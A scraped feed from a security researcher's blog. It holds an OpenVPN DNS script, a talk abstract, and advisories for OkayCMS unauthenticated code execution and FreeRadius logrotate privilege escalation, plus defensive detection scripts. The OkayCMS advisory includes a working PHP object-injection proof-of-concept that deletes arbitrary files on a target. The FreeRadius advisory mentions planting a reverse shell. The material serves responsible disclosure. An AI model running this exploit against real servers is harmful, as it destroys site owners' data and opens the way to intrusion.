Security https://tech.feedyourhead.at/ en OpenVPN: updating /etc/resolv.conf https://tech.feedyourhead.at/content/openvpn-updating-resolv.conf <span class="field field--name-title field--type-string field--label-hidden">OpenVPN: updating /etc/resolv.conf</span> <div class="clearfix text-formatted field field--name-body field--type-text-with-summary field--label-hidden field__item"><p>OpenVPN ships example scripts that update <em>/etc/resolv.conf</em> through "resolvconf" or systemd-resolvconf. I use neither of them, so I <a href="https://github.com/whotwagner/update-resolv.conf.git">modified the script</a> so that it simply writes <em>/etc/resolv.conf</em> directly. I added a variable "IMMUTEABLE" to this script. If IMMUTEABLE is set to 1, the script sets the immutable file attribute on /etc/resolv.conf. That prevents other programs, such as DHCP clients, from overwriting /etc/resolv.conf while OpenVPN is running. I know it is a little hacky, but it works for me. 
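Added example, not the author's script from the linked repository: a minimal OpenVPN up/down hook in POSIX shell that builds /etc/resolv.conf from the foreign_option_N variables OpenVPN exports to its scripts and applies the IMMUTEABLE switch described above. The variables RESOLV_CONF and BACKUP, the backup path and the function names are assumptions of this example.

```shell
#!/bin/sh
# Added example (not the script from the linked repository): an OpenVPN
# --up/--down hook that renders /etc/resolv.conf from the foreign_option_N
# variables OpenVPN exports and, if IMMUTEABLE=1, pins the file with chattr +i.
# RESOLV_CONF, BACKUP and the function names are this example's own choices;
# IMMUTEABLE mirrors the switch from the post.

RESOLV_CONF="${RESOLV_CONF:-/etc/resolv.conf}"
BACKUP="${BACKUP:-/etc/resolv.conf.openvpn-backup}"
IMMUTEABLE="${IMMUTEABLE:-1}"

# Print the resolv.conf content derived from foreign_option_1..N. OpenVPN hands
# pushed options to the script as foreign_option_1="dhcp-option DNS 10.8.0.1",
# foreign_option_2="dhcp-option DOMAIN corp.example" and so on.
build_resolv_conf() {
    i=1
    domains=""
    servers=""
    while :; do
        eval "opt=\${foreign_option_$i:-}"
        [ -n "$opt" ] || break
        # Split on whitespace: $1=dhcp-option $2=DNS|DOMAIN|... $3=value.
        set -- $opt
        case "$1 $2" in
            "dhcp-option DNS")    servers="$servers $3" ;;
            "dhcp-option DOMAIN") domains="$domains $3" ;;
        esac
        i=$((i + 1))
    done
    if [ -n "$domains" ]; then
        printf 'search%s\n' "$domains"
    fi
    for s in $servers; do
        printf 'nameserver %s\n' "$s"
    done
}

# Replace resolv.conf with the rendered content. The immutable bit must be
# cleared before the write and is set again afterwards; both need root and a
# filesystem that supports chattr (ext2/3/4, xfs, btrfs).
apply_resolv_conf() {
    content=$(build_resolv_conf)
    if [ -z "$content" ]; then
        echo "no DNS options pushed, leaving $RESOLV_CONF untouched" >&2
        return 1
    fi
    chattr -i "$RESOLV_CONF" 2>/dev/null || true
    [ -f "$BACKUP" ] || cp -p "$RESOLV_CONF" "$BACKUP"
    printf '# generated by the OpenVPN up script\n%s\n' "$content" > "$RESOLV_CONF"
    if [ "$IMMUTEABLE" = 1 ]; then
        chattr +i "$RESOLV_CONF"
    fi
}

# Undo on --down: drop the immutable bit and put the saved file back.
restore_resolv_conf() {
    chattr -i "$RESOLV_CONF" 2>/dev/null || true
    if [ -f "$BACKUP" ]; then
        mv "$BACKUP" "$RESOLV_CONF"
    fi
}

# OpenVPN sets script_type to "up" or "down" before running the hook; when the
# file is sourced elsewhere (script_type unset) nothing is touched.
case "${script_type:-}" in
    up)   apply_resolv_conf ;;
    down) restore_resolv_conf ;;
esac
```

Hook it in with `script-security 2`, `up /path/to/script` and `down /path/to/script` in the client configuration. The immutable bit only keeps other processes from rewriting the file; the nameservers written into it come from the VPN server's pushed options, so the file is exactly as trustworthy as that server.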
<a href="https://github.com/whotwagner/update-resolv.conf.git">The full source can be downloaded at github.com.</a></p></div> <span class="field field--name-uid field--type-entity-reference field--label-hidden"><span lang="" about="/users/hoti" typeof="schema:Person" property="schema:name" datatype="">Hoti</span></span> <span class="field field--name-created field--type-created field--label-hidden">Dec 26 2019</span> <div class="field field--name-field-tagies field--type-entity-reference field--label-above"> <div class="field__label">Tags</div> <div class='field__items'> <div class="field__item"><i class="fa fa-tags"></i> <a href="/Linux" hreflang="en">Linux</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/tricks" hreflang="en">Tricks</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/Programming" hreflang="en">Programming</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/sysadmin" hreflang="en">Sysadmin</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/bash" hreflang="en">Bash</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/openssl" hreflang="en">openssl</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/security" hreflang="en">Security</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/downloads" hreflang="en">Downloads</a></div> </div> </div> Thu, 26 Dec 2019 
16:45:26 +0000 Hoti 287 at https://tech.feedyourhead.at BSides 2019: Code diving for pop chains https://tech.feedyourhead.at/content/bsides2019-code-diving-for-pop-chains <span class="field field--name-title field--type-string field--label-hidden">BSides 2019: Code diving for pop chains</span> <div class="clearfix text-formatted field field--name-body field--type-text-with-summary field--label-hidden field__item"><p><img alt="bsides vienna 2019 talk" data-entity-type="file" data-entity-uuid="f551b7b1-0611-4457-9ed1-c6af5193e0d8" height="691" src="/sites/default/files/inline-images/php_object_injection.jpg" width="1460" /></p> <p>I gave a talk at <a href="https://bsidesvienna.at/">BSides 2019 Vienna</a> about PHP Object Injection. Here is the abstract of the talk:</p> <blockquote> <p>PHP Object Injection is a well-known web vulnerability that can allow an attacker to perform different kinds of attacks by reusing and chaining existing code of the application (gadgets). Sometimes it is easier to find the vulnerability than to discover a proper chain for remote code execution. This talk illustrates the long road of searching for various "POP chains" by disclosing details of a vulnerability in Okay-CMS. The code of the application will be analyzed and possible payloads will be discussed. 
A working unauthenticated remote code execution exploit finally proves the concept.</p> </blockquote> <p>The slides can be downloaded here: <a href="/sites/default/files/DateiUploads/Code_Diving_for_Pop_Chains.pdf">Slides</a></p> </div> <span class="field field--name-uid field--type-entity-reference field--label-hidden"><span lang="" about="/users/hoti" typeof="schema:Person" property="schema:name" datatype="">Hoti</span></span> <span class="field field--name-created field--type-created field--label-hidden">Dec 11 2019</span> <div class="field field--name-field-tagies field--type-entity-reference field--label-above"> <div class="field__label">Tags</div> <div class='field__items'> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/security" hreflang="en">Security</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/Programming" hreflang="en">Programming</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/news" hreflang="en">News</a></div> </div> </div> Wed, 11 Dec 2019 12:41:54 +0000 Hoti 285 at https://tech.feedyourhead.at OkayCMS: Unauthenticated remote code execution https://tech.feedyourhead.at/content/unauthenticated-remote-code-execution-okaycms <span class="field field--name-title field--type-string field--label-hidden">OkayCMS: Unauthenticated remote code execution</span> <div class="clearfix text-formatted field field--name-body field--type-text-with-summary 
field--label-hidden field__item"><p>Identifier: AIT-SA-20191129-01<br /> Target: OkayCMS<br /> Vendor: OkayCMS<br /> Version: all versions including 2.3.4<br /> CVE: <a href="https://nvd.nist.gov/vuln/detail/CVE-2019-16885">CVE-2019-16885</a><br /> Accessibility: Local<br /> Severity: Critical<br /> Author: Wolfgang Hotwagner (AIT Austrian Institute of Technology)</p> <h4>Summary</h4> <p><a href="https://okay-cms.com/">OkayCMS is a simple and functional content management system for an online store.</a></p> <h4>Vulnerability Description</h4> <p>An unauthenticated attacker can upload a webshell by injecting a malicious PHP object via a crafted cookie. This can happen in two places: in “<em>view/ProductsView.php</em>” through the cookie "price_filter", and in “<em>api/Comparison.php</em>” through the cookie "comparison". Both cookies pass untrusted values to an unserialize() call. The following code shows the vulnerability in “<em>api/Comparison.php</em>”:</p> <div class="geshifilter"><pre class="php geshifilter-php" style="font-family:monospace;"><span style="color: #000088;">$items</span> <span style="color: #339933;">=</span> <span style="color: #339933;">!</span><a href="http://www.php.net/empty"><span style="color: #990000;">empty</span></a><span style="color: #009900;">&#40;</span><span style="color: #000088;">$_COOKIE</span><span style="color: #009900;">&#91;</span><span style="color: #0000ff;">'comparison'</span><span style="color: #009900;">&#93;</span><span style="color: #009900;">&#41;</span> ? 
<a href="http://www.php.net/unserialize"><span style="color: #990000;">unserialize</span></a><span style="color: #009900;">&#40;</span><span style="color: #000088;">$_COOKIE</span><span style="color: #009900;">&#91;</span><span style="color: #0000ff;">'comparison'</span><span style="color: #009900;">&#93;</span><span style="color: #009900;">&#41;</span> <span style="color: #339933;">:</span> <a href="http://www.php.net/array"><span style="color: #990000;">array</span></a><span style="color: #009900;">&#40;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span></pre></div> <p>The unsafe deserialization also occurs in “<em>view/ProductsView.php</em>”:</p> <div class="geshifilter"><pre class="php geshifilter-php" style="font-family:monospace;"><span style="color: #000088;">$price_filter</span> <span style="color: #339933;">=</span> <a href="http://www.php.net/unserialize"><span style="color: #990000;">unserialize</span></a><span style="color: #009900;">&#40;</span><span style="color: #000088;">$_COOKIE</span><span style="color: #009900;">&#91;</span><span style="color: #0000ff;">'price_filter'</span><span style="color: #009900;">&#93;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span></pre></div> <h4>Proof of Concept</h4> <p>The following code utilizes an object of the smarty-component to delete arbitrary files from the webhost:</p> <div class="geshifilter"><pre class="php geshifilter-php" style="font-family:monospace;"><span style="color: #000000; font-weight: bold;">&lt;?php</span> &nbsp; <span style="color: #b1b100;">if</span><span style="color: #009900;">&#40;</span><span style="color: #000088;">$argc</span> <span style="color: #339933;">!=</span> <span style="color: #cc66cc;">3</span><span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span> <span style="color: #b1b100;">print</span> <span style="color: #0000ff;">&quot;usage: <span style="color: #006699; font-weight: 
bold;">$argv[0]</span> &lt;url&gt; &lt;file&gt;<span style="color: #000099; font-weight: bold;">\n</span>&quot;</span><span style="color: #339933;">;</span> <a href="http://www.php.net/exit"><span style="color: #990000;">exit</span></a><span style="color: #009900;">&#40;</span><span style="color: #cc66cc;">1</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <span style="color: #009900;">&#125;</span> &nbsp; <span style="color: #000088;">$url</span> <span style="color: #339933;">=</span> <span style="color: #000088;">$argv</span><span style="color: #009900;">&#91;</span><span style="color: #cc66cc;">1</span><span style="color: #009900;">&#93;</span><span style="color: #339933;">;</span> <span style="color: #000088;">$file</span> <span style="color: #339933;">=</span> <span style="color: #000088;">$argv</span><span style="color: #009900;">&#91;</span><span style="color: #cc66cc;">2</span><span style="color: #009900;">&#93;</span><span style="color: #339933;">;</span> &nbsp; <span style="color: #000000; font-weight: bold;">class</span> Smarty_Internal_CacheResource_File <span style="color: #009900;">&#123;</span> &nbsp; <span style="color: #000000; font-weight: bold;">public</span> <span style="color: #000000; font-weight: bold;">function</span> releaseLock<span style="color: #009900;">&#40;</span>Smarty <span style="color: #000088;">$smarty</span><span style="color: #339933;">,</span> Smarty_Template_Cached <span style="color: #000088;">$cached</span><span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span> <span style="color: #000088;">$cached</span><span style="color: #339933;">-&gt;</span><span style="color: #004000;">is_locked</span> <span style="color: #339933;">=</span> <span style="color: #009900; font-weight: bold;">false</span><span style="color: #339933;">;</span> <span style="color: #339933;">@</span><a href="http://www.php.net/unlink"><span style="color: #990000;">unlink</span></a><span 
style="color: #009900;">&#40;</span><span style="color: #000088;">$cached</span><span style="color: #339933;">-&gt;</span><span style="color: #004000;">lock_id</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <span style="color: #009900;">&#125;</span> <span style="color: #009900;">&#125;</span> &nbsp; <span style="color: #000000; font-weight: bold;">class</span> Smarty_Template_Cached <span style="color: #009900;">&#123;</span> <span style="color: #000000; font-weight: bold;">public</span> <span style="color: #000088;">$handler</span> <span style="color: #339933;">=</span> <span style="color: #009900; font-weight: bold;">null</span><span style="color: #339933;">;</span> <span style="color: #000000; font-weight: bold;">public</span> <span style="color: #000088;">$is_locked</span> <span style="color: #339933;">=</span> <span style="color: #009900; font-weight: bold;">true</span><span style="color: #339933;">;</span> <span style="color: #000000; font-weight: bold;">public</span> <span style="color: #000088;">$lock_id</span> <span style="color: #339933;">=</span> <span style="color: #0000ff;">&quot;&quot;</span><span style="color: #339933;">;</span> &nbsp; <span style="color: #000000; font-weight: bold;">public</span> <span style="color: #000000; font-weight: bold;">function</span> __construct<span style="color: #009900;">&#40;</span><span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span> <span style="color: #000088;">$this</span><span style="color: #339933;">-&gt;</span><span style="color: #004000;">lock_id</span> <span style="color: #339933;">=</span> <span style="color: #000088;">$GLOBALS</span><span style="color: #009900;">&#91;</span><span style="color: #0000ff;">'file'</span><span style="color: #009900;">&#93;</span><span style="color: #339933;">;</span> <span style="color: #000088;">$this</span><span style="color: #339933;">-&gt;</span><span style="color: #004000;">handler</span> <span 
style="color: #339933;">=</span> <span style="color: #000000; font-weight: bold;">new</span> Smarty_Internal_CacheResource_File<span style="color: #339933;">;</span> <span style="color: #009900;">&#125;</span> <span style="color: #009900;">&#125;</span> &nbsp; &nbsp; <span style="color: #000000; font-weight: bold;">class</span> Smarty <span style="color: #009900;">&#123;</span> <span style="color: #000000; font-weight: bold;">public</span> <span style="color: #000088;">$cache_locking</span> <span style="color: #339933;">=</span> <span style="color: #009900; font-weight: bold;">true</span><span style="color: #339933;">;</span> <span style="color: #009900;">&#125;</span> &nbsp; <span style="color: #000000; font-weight: bold;">class</span> Smarty_Internal_Template <span style="color: #009900;">&#123;</span> <span style="color: #000000; font-weight: bold;">public</span> <span style="color: #000088;">$smarty</span> <span style="color: #339933;">=</span> <span style="color: #009900; font-weight: bold;">null</span><span style="color: #339933;">;</span> <span style="color: #000000; font-weight: bold;">public</span> <span style="color: #000088;">$cached</span> <span style="color: #339933;">=</span> <span style="color: #009900; font-weight: bold;">null</span><span style="color: #339933;">;</span> &nbsp; <span style="color: #000000; font-weight: bold;">public</span> <span style="color: #000000; font-weight: bold;">function</span> __construct<span style="color: #009900;">&#40;</span><span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span> <span style="color: #000088;">$this</span><span style="color: #339933;">-&gt;</span><span style="color: #004000;">smarty</span> <span style="color: #339933;">=</span> <span style="color: #000000; font-weight: bold;">new</span> Smarty<span style="color: #339933;">;</span> <span style="color: #000088;">$this</span><span style="color: #339933;">-&gt;</span><span style="color: #004000;">cached</span> <span 
style="color: #339933;">=</span> <span style="color: #000000; font-weight: bold;">new</span> Smarty_Template_Cached<span style="color: #339933;">;</span> <span style="color: #009900;">&#125;</span> &nbsp; <span style="color: #000000; font-weight: bold;">public</span> <span style="color: #000000; font-weight: bold;">function</span> __destruct<span style="color: #009900;">&#40;</span><span style="color: #009900;">&#41;</span><span style="color: #009900;">&#123;</span> <span style="color: #b1b100;">if</span> <span style="color: #009900;">&#40;</span><span style="color: #000088;">$this</span><span style="color: #339933;">-&gt;</span><span style="color: #004000;">smarty</span><span style="color: #339933;">-&gt;</span><span style="color: #004000;">cache_locking</span> <span style="color: #339933;">&amp;&amp;</span> <a href="http://www.php.net/isset"><span style="color: #990000;">isset</span></a><span style="color: #009900;">&#40;</span><span style="color: #000088;">$this</span><span style="color: #339933;">-&gt;</span><span style="color: #004000;">cached</span><span style="color: #009900;">&#41;</span> <span style="color: #339933;">&amp;&amp;</span> <span style="color: #000088;">$this</span><span style="color: #339933;">-&gt;</span><span style="color: #004000;">cached</span><span style="color: #339933;">-&gt;</span><span style="color: #004000;">is_locked</span><span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span> <span style="color: #000088;">$this</span><span style="color: #339933;">-&gt;</span><span style="color: #004000;">cached</span><span style="color: #339933;">-&gt;</span><span style="color: #004000;">handler</span><span style="color: #339933;">-&gt;</span><span style="color: #004000;">releaseLock</span><span style="color: #009900;">&#40;</span><span style="color: #000088;">$this</span><span style="color: #339933;">-&gt;</span><span style="color: #004000;">smarty</span><span style="color: #339933;">,</span> <span style="color: 
#000088;">$this</span><span style="color: #339933;">-&gt;</span><span style="color: #004000;">cached</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <span style="color: #009900;">&#125;</span> <span style="color: #009900;">&#125;</span> <span style="color: #009900;">&#125;</span> &nbsp; <span style="color: #000088;">$obj</span> <span style="color: #339933;">=</span> <span style="color: #000000; font-weight: bold;">new</span> Smarty_Internal_Template<span style="color: #009900;">&#40;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> &nbsp; <span style="color: #000088;">$serialized</span> <span style="color: #339933;">=</span> <a href="http://www.php.net/serialize"><span style="color: #990000;">serialize</span></a><span style="color: #009900;">&#40;</span><span style="color: #000088;">$obj</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> &nbsp; <span style="color: #000088;">$un</span> <span style="color: #339933;">=</span> <a href="http://www.php.net/unserialize"><span style="color: #990000;">unserialize</span></a><span style="color: #009900;">&#40;</span><span style="color: #000088;">$serialized</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> &nbsp; <span style="color: #000088;">$headers</span> <span style="color: #339933;">=</span> <span style="color: #009900;">&#91;</span> <span style="color: #0000ff;">'Accept-Language: en-US,en;q=0.5'</span><span style="color: #339933;">,</span> <span style="color: #0000ff;">&quot;Referer: <span style="color: #006699; font-weight: bold;">$url</span>/en/catalog/myagkie-igrushki&quot;</span><span style="color: #339933;">,</span> <span style="color: #0000ff;">'Cookie: '</span> <span style="color: #339933;">.</span> <span style="color: #0000ff;">'price_filter='</span> <span style="color: #339933;">.</span> <a href="http://www.php.net/urlencode"><span style="color: 
#990000;">urlencode</span></a><span style="color: #009900;">&#40;</span><span style="color: #000088;">$serialized</span><span style="color: #009900;">&#41;</span> <span style="color: #339933;">.</span> <span style="color: #0000ff;">';'</span> <span style="color: #009900;">&#93;</span><span style="color: #339933;">;</span> &nbsp; <span style="color: #000088;">$curl</span> <span style="color: #339933;">=</span> <a href="http://www.php.net/curl_init"><span style="color: #990000;">curl_init</span></a><span style="color: #009900;">&#40;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <a href="http://www.php.net/curl_setopt_array"><span style="color: #990000;">curl_setopt_array</span></a><span style="color: #009900;">&#40;</span><span style="color: #000088;">$curl</span><span style="color: #339933;">,</span> <span style="color: #009900;">&#91;</span> CURLOPT_HTTPHEADER <span style="color: #339933;">=&gt;</span> <span style="color: #000088;">$headers</span><span style="color: #339933;">,</span> CURLOPT_RETURNTRANSFER <span style="color: #339933;">=&gt;</span> <span style="color: #009900; font-weight: bold;">true</span><span style="color: #339933;">,</span> CURLOPT_URL <span style="color: #339933;">=&gt;</span> <span style="color: #0000ff;">&quot;<span style="color: #006699; font-weight: bold;">$url</span>/en/catalog/myagkie-igrushki/sort-price&quot;</span><span style="color: #339933;">,</span> CURLOPT_USERAGENT <span style="color: #339933;">=&gt;</span> <span style="color: #0000ff;">'Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0'</span> <span style="color: #009900;">&#93;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <span style="color: #000088;">$resp</span> <span style="color: #339933;">=</span> <a href="http://www.php.net/curl_exec"><span style="color: #990000;">curl_exec</span></a><span style="color: #009900;">&#40;</span><span style="color: 
#000088;">$curl</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <span style="color: #b1b100;">if</span><span style="color: #009900;">&#40;</span><a href="http://www.php.net/curl_error"><span style="color: #990000;">curl_error</span></a><span style="color: #009900;">&#40;</span><span style="color: #000088;">$curl</span><span style="color: #009900;">&#41;</span><span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span> <span style="color: #b1b100;">print</span> <a href="http://www.php.net/curl_error"><span style="color: #990000;">curl_error</span></a><span style="color: #009900;">&#40;</span><span style="color: #000088;">$curl</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <span style="color: #009900;">&#125;</span> <a href="http://www.php.net/curl_close"><span style="color: #990000;">curl_close</span></a><span style="color: #009900;">&#40;</span><span style="color: #000088;">$curl</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> &nbsp; &nbsp; <span style="color: #b1b100;">print</span> <span style="color: #000088;">$resp</span><span style="color: #339933;">;</span> &nbsp; <span style="color: #000000; font-weight: bold;">?&gt;</span></pre></div> <h4>Notes</h4> <p>Because of the high severity of this vulnerability we will not release a full exploit for the remote code execution.</p> <h4>Vulnerable Versions</h4> <p>All versions of the “Lite”-branch including 2.3.4. 
Pro versions prior to 3.0.2 might have been affected too.</p> <h4>Tested Versions</h4> <p>OkayCMS-Lite 2.3.4</p> <h4>Impact</h4> <p>An unauthenticated attacker could upload a webshell to the server and execute commands remotely.</p> <h4>Mitigation</h4> <p>At the time of this publication the vendor has only patched the paid version of the CMS, so switching to other free software or upgrading to the Pro version of OkayCMS is recommended.</p> <h4>Vendor Contact Timeline</h4> <p>2019-08-29: Contacting the vendor</p> <p>2019-09-04: Vendor replied</p> <p>2019-09-17: Vendor released commercial version 3.0.2 including a bugfix</p> <p>2019-09-29: Public disclosure</p> <h4>Advisory URL</h4> <p><a href="https://www.ait.ac.at/ait-sa-20191129-01-unauthenticated-remote-code-execution-okaycms">https://www.ait.ac.at/ait-sa-20191129-01-unauthenticated-remote-code-execution-okaycms</a></p> </div> <span class="field field--name-uid field--type-entity-reference field--label-hidden"><span lang="" about="/users/hoti" typeof="schema:Person" property="schema:name" datatype="">Hoti</span></span> <span class="field field--name-created field--type-created field--label-hidden">Dec 02 2019</span> <div class="field field--name-field-tagies field--type-entity-reference field--label-above"> <div class="field__label">Tags</div> <div class='field__items'> <div class="field__item"><i class="fa fa-tags"></i> <a href="/taxonomy/term/107" hreflang="en">CVE</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/security" hreflang="en">Security</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/Programming" hreflang="en">Programming</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/web" hreflang="en">Web</a></div> </div> </div> <section class="field field--name-comment field--type-comment field--label-above comment-wrapper"> 
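As an added defender-side example (not part of the advisory or of OkayCMS), the following POSIX shell check scans request lines for cookies that carry a serialized PHP object, the input shape the two unserialize() calls in the advisory above should never receive. The sample log lines, the path /compare and the class name SomeClass are constructed for this example.

```shell
#!/bin/sh
# Added example, not part of the advisory or of OkayCMS: flag requests whose
# cookies carry a serialized PHP object (O:<len>:"Class"...), the input shape
# that must never reach unserialize(). The price_filter and comparison cookies
# legitimately hold serialized arrays (a:...), so only objects are flagged.

# Constructed sample lines, "<client> <method> <path> Cookie: <header value>".
# The path /compare and the class name SomeClass are made up for this example.
SAMPLE_LOG='192.0.2.10 GET /en/catalog/myagkie-igrushki/sort-price Cookie: price_filter=a%3A2%3A%7Bs%3A3%3A%22min%22%3Bi%3A10%3Bs%3A3%3A%22max%22%3Bi%3A50%3B%7D
192.0.2.11 GET /en/catalog/myagkie-igrushki/sort-price Cookie: price_filter=O%3A9%3A%22SomeClass%22%3A0%3A%7B%7D
192.0.2.12 GET /compare Cookie: comparison=a%3A1%3A%7Bi%3A0%3Bi%3A42%3B%7D; PHPSESSID=abc123
192.0.2.13 GET /compare Cookie: PHPSESSID=abc123; comparison=O:9:"SomeClass":0:{}'

# cookie_has_php_object COOKIE_HEADER -> exit 0 when a serialized-object marker
# is present, either raw (O:9:") or percent-encoded (O%3A9%3A%22).
cookie_has_php_object() {
    printf '%s' "$1" | grep -Eiq '(^|[;= ])O(:|%3A)[0-9]+(:|%3A)("|%22)'
}

# scan_cookie_log: read sample lines on stdin, print "SUSPECT <client> <path>"
# for every request whose Cookie header carries a serialized object.
scan_cookie_log() {
    while IFS= read -r line; do
        cookie=${line#*Cookie: }
        if cookie_has_php_object "$cookie"; then
            set -- $line
            printf 'SUSPECT %s %s\n' "$1" "$3"
        fi
    done
}

# count_suspects -> number of flagged requests in SAMPLE_LOG.
count_suspects() {
    printf '%s\n' "$SAMPLE_LOG" | scan_cookie_log | awk 'END { print NR }'
}

# Report for the constructed sample (two of the four lines are flagged).
printf '%s\n' "$SAMPLE_LOG" | scan_cookie_log
```

The check deliberately ignores serialized arrays because both cookies legitimately hold those, and it will miss payloads wrapped in another encoding, so treat it as a detection aid only. The code-level fix is to stop calling unserialize() on cookie data (store JSON in the cookie instead) or, at minimum, to pass `['allowed_classes' => false]` as the second argument so that no object can be instantiated from it.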
</section> Mon, 02 Dec 2019 18:25:19 +0000 Hoti 284 at https://tech.feedyourhead.at FreeRadius: Privilege Escalation via Logrotate https://tech.feedyourhead.at/content/privilege-escalation-via-logrotate-freeradius <span class="field field--name-title field--type-string field--label-hidden">FreeRadius: Privilege Escalation via Logrotate</span> <div class="clearfix text-formatted field field--name-body field--type-text-with-summary field--label-hidden field__item"><h2>Identifier: AIT-SA-20191112-01</h2> <p>Target: FreeRadius<br /> Vendor: FreeRadius<br /> Version: all versions including 3.0.19<br /> Fixed in Version: 12.2.3, 12.1.8 and 12.0.8<br /> CVE: <a href="https://nvd.nist.gov/vuln/detail/CVE-2019-10143">CVE-2019-10143</a><br /> Accessibility: Local<br /> Severity: Low<br /> Author: Wolfgang Hotwagner (AIT Austrian Institute of Technology)</p> <h4>Summary</h4> <p><a href="https://freeradius.org/">FreeRadius is a modular Open-Source RADIUS suite.</a></p> <h4>Vulnerability Description</h4> <p>The log directory “radacct” is owned by user "radiusd". User “radiusd” can elevate its privileges to “root” because of an unsafe interaction with logrotate.<br /> User “radiusd” owns the log directory <em>/var/log/radius/radacct</em>:</p> <div class="geshifilter"><pre class="bash geshifilter-bash" style="font-family:monospace;">&nbsp; drwx------. <span style="color: #000000;">3</span> radiusd radiusd <span style="color: #000000;">4096</span> <span style="color: #000000;">26</span>. 
Apr <span style="color: #000000;">16</span>:01 <span style="color: #000000; font-weight: bold;">/</span>var<span style="color: #000000; font-weight: bold;">/</span>log<span style="color: #000000; font-weight: bold;">/</span>radius<span style="color: #000000; font-weight: bold;">/</span>radacct<span style="color: #000000; font-weight: bold;">/</span> </pre></div> <p>Log files are rotated once a day (or at any other configured frequency) by logrotate running as user root. The configuration does not use the “su” directive:</p> <div class="geshifilter"><pre class="bash geshifilter-bash" style="font-family:monospace;">&nbsp; <span style="color: #000000; font-weight: bold;">/</span>var<span style="color: #000000; font-weight: bold;">/</span>log<span style="color: #000000; font-weight: bold;">/</span>radius<span style="color: #000000; font-weight: bold;">/</span>radacct<span style="color: #000000; font-weight: bold;">/*/</span>detail <span style="color: #7a0874; font-weight: bold;">&#123;</span> monthly rotate <span style="color: #000000;">4</span> nocreate missingok compress <span style="color: #7a0874; font-weight: bold;">&#125;</span></pre></div> <p>Since logrotate is prone to a race condition (see <a href="https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition">https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition</a>), user "radiusd" can replace the directory /var/log/radius/radacct/logdir with a symbolic link to any directory (for example /etc/bash_completion.d). logrotate will then place the compressed files AS ROOT into /etc/bash_completion.d and set their owner and group to "radiusd.radiusd". An attacker could simply place a reverse shell into this file. 
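Added example, not from the advisory or from the FreeRADIUS project: a POSIX shell check for the condition described above, a logrotate stanza without a su directive that rotates files inside a directory owned by an unprivileged user. The stanza text is copied from the advisory; the hardened variant with su radiusd radiusd, the function names and the labels "risky"/"ok" are this example's own.

```shell
#!/bin/sh
# Added example, not from the advisory or from FreeRADIUS: detect a logrotate
# stanza that lacks "su" while rotating inside a directory owned by a non-root
# user. Function names and the "risky"/"ok" labels are this example's own.

# Constructed copy of the stanza quoted in the advisory.
VULNERABLE_CONF='/var/log/radius/radacct/*/detail {
    monthly
    rotate 4
    nocreate
    missingok
    compress
}'

# Same stanza with "su radiusd radiusd": logrotate then performs the rotation
# as that user and group, so a symlink planted by radiusd is followed with
# radiusd privileges only, not as root.
HARDENED_CONF='/var/log/radius/radacct/*/detail {
    su radiusd radiusd
    monthly
    rotate 4
    nocreate
    missingok
    compress
}'

# stanza_has_su CONF PATH -> prints "yes", "no", or "missing" (no stanza
# header contains PATH). Walks the config text and looks for a
# "su <user> <group>" line inside the braces of the matching stanza.
stanza_has_su() {
    printf '%s\n' "$1" | awk -v path="$2" '
        /[{][ \t]*$/ { in_stanza = (index($0, path) > 0); has_su = 0; next }
        in_stanza && $1 == "su" && NF == 3 { has_su = 1 }
        /^[ \t]*[}]/ {
            if (in_stanza) { msg = has_su ? "yes" : "no"; print msg; found = 1 }
            in_stanza = 0
        }
        END { if (!found) print "missing" }
    '
}

# dir_owner DIR -> owning user of DIR (parses ls -ld, which is portable).
dir_owner() {
    ls -ld "$1" | awk '{ print $3 }'
}

# audit_stanza CONF PATH OWNER -> "risky" when the directory is owned by a
# non-root user and the stanza lacks "su", "ok" otherwise. OWNER is a parameter
# so the logic can be exercised without the real directory being present.
audit_stanza() {
    if [ "$3" != "root" ] && [ "$(stanza_has_su "$1" "$2")" = "no" ]; then
        echo "risky"
    else
        echo "ok"
    fi
}

# Usage on a live host (the config path is an assumption; check your distribution):
#   audit_stanza "$(cat /etc/logrotate.d/radiusd)" /var/log/radius/radacct \
#                "$(dir_owner /var/log/radius/radacct)"
```

Note that logrotate's built-in refusal to rotate inside directories with insecure permissions only triggers for group- or world-writable directories; a 0700 directory owned by a service user, as in this advisory, passes that check, which is exactly why the su directive matters here.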
